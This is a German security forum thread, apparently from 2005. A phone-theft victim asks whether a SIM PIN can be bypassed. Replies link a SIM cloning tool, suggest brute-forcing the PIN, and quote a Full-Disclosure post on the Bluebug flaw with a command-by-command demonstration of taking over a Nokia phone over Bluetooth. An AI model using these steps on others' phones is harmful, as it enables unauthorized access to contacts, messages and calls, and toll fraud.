| (In)security allgemein Sicherheit, Anonymität im Netz. Schutz und Maßnahmen. Prävention und Konzepte. Sicherheitsarchitekturen allgemein und auf der Netzwerkebene. |
Diskussion: pinumgehung bei handy doch möglich ? im Forum (In)security allgemein, in der Kategorie Security Area; Anzeige hallo ....ich hab ein problem und nachdem ich bei meinen recherchen auf das board kam, wollt ich mich mal ...
![]() |
| | #1 (permalink) |
| Registriert seit: 31.01.05 ![]() Likes: 0 | Anzeige hallo ....ich hab ein problem und nachdem ich bei meinen recherchen auf das board kam, wollt ich mich mal erkundigen. mir ist vor weihnachten mein nokia 3510 i abhanden gekommen, was aber AUS geschaltet war. erst dachte ich , ich habs verlegt und nicht intensiv gesucht. dann hab ichs sperren lassen und eine neue karte bekommen. bei der rechnung traf mich der schlag, hatte doch einer fröhlich 2 tage nach bulgarien telefoniert für schlappe 500 euro bis vodaphone das selber gesperrt hat, weils ihnen wohl komisch vorkam. ich hatte mich aber in sicherheit gewogen , weil behauptet wird von vodaphone ,man könne die pin abfrage nicht umgehn. die kripo meinte , es lägen bei ihnen vage erkenntnisse vor, dass es da wohl schon dinge gäbe, die simcards- ähnlich der scheckkarte - auf blancocards zu kopieren und dann mit neuer pin zu versehen und zu telefonieren.sei im ostblock sehr beliebt und würde zu uns schwappen.. nur könnten sie mir nicht wirklich was dazu sagen , sie seien technisch noch nicht soweit !!!!!! ich muss also um bei vodaphone meine haftungsgrenze anerkannt zu kriegen irgendwie rauskriegen ob das machbar ist theoretisch und wie....ich find nur leider nichts dazu im netz ...könnt ihr mir da ein paar tips geben wo ich anfragen kann und soll ? das lka bayern ist jedenfalls noch nicht soweit, dass sie kapieren wie das gemacht wird. vielen dank :-) schnakes |
| | |
| | #2 (permalink) |
| Senior Member Registriert seit: 23.12.03 ![]() Likes: 0 | Evtl hiermit ? http://ucables.com/ref/SIM-BACKUP Kopieren und Bruteforce auf die Pin ?? Über das bin ich auch noch gestolpert http://simlock.siemensiak.pl/techgsm...Solutions.html |
| | |
| HaBOT | - Anzeige - |
| |
| | #3 (permalink) |
| Themenstarter Registriert seit: 31.01.05 ![]() Likes: 0 | hallo :-)) danke für den link des progis, ich weiss zwar nicht ob die das als beweis akzeptieren,aber vielleicht finde ich noch irgendwo berichte, dass das knacken einer d2 simcard älteren baujahrs ( meine stammte von 2000/01 aus meinem alten 3310) bereits gelungen ist. vodaphone streitet die möglichkeit ja kategorisch ab und es geistern ja durchaus gerüchte herum, dass das anderen wohl testweise schon gelungen sei. gruss schnakes |
| | |
| | #4 (permalink) |
| Senior Member Registriert seit: 23.12.03 ![]() Likes: 0 | Da sind sie :-) Adam Laurie napisaB(a): > Details of the attacks were disclosed at the Chaos Computer Club's annual > congress in Berlin - 21C3: According to the [1], not all details were disclosed. Actually, there is no reason for keeping them secret here, while they are well known and actively exploited in the blackhat community. The Bluebug, as described on [1] is trivially exploitable on some non-Symbian Nokia phones. It allows attacker to create serial profile connection without pairing or asking for permission, therefore it gives unauthorized access to all AT commands. It is possible to read/delete/send SMS messages, add/view/delete phonebook entries, change call diverts, initiate voice or data call. Demonstration on Nokia 6310i: laptop:~# hcitool scan Scanning ... 00:60:57:38:8C 8 Nokia 6310ilaptop:~# rfcomm bind /dev/rfcomm0 00:60:57:38:8C 8 17Now you can use plain AT commands, as described in manual [2] or Gnokii [3], for example: laptop:~# cu -l rfcomm0 -s 9600 Connected. [ATE1] OK ATI Nokia OK AT+CPBS? +CPBS: "SM",0,100 OK AT+CPBR=? +CPBR: (1-100),48,18 OK ATDT+48609xxxxxx OK As you can see, the bug is really trivial and looks rather like backdoor. [1] - http://www.thebunker.net/security/bluetooth.htm [2] - http://ncsp.forum.nokia.com/download...11579;ref=devx [3] - http://www.gnokii.org/ Quelle: Full-Disclosure |
| | |
![]() |
| - Anzeige - | |
| |
| Themen-Optionen | |
| Ansicht | |
| |
Ähnliche Themen | ||||
| Thema | Autor | Forum | Antworten | Letzter Beitrag |
| Schäuble ist doch harmlos... | detrexer | News & Ankündigungen | 15 | 19.10.07 13:09 |
| ASP, PHP oder doch PERL? | ghostdog | Code Kitchen | 18 | 22.04.06 09:30 |
| ->!!!Final Fantasy X und X-2 doch für PC!!!<- | Master-X | Games | 22 | 05.03.04 22:07 |
| MAL was Anderes und doch das gleiche | MATRIX3 | (In)security allgemein | 16 | 26.11.03 09:25 |
| ist doch logisch, oder? | derBlubb | Off topic-Zone | 0 | 19.12.01 13:57 |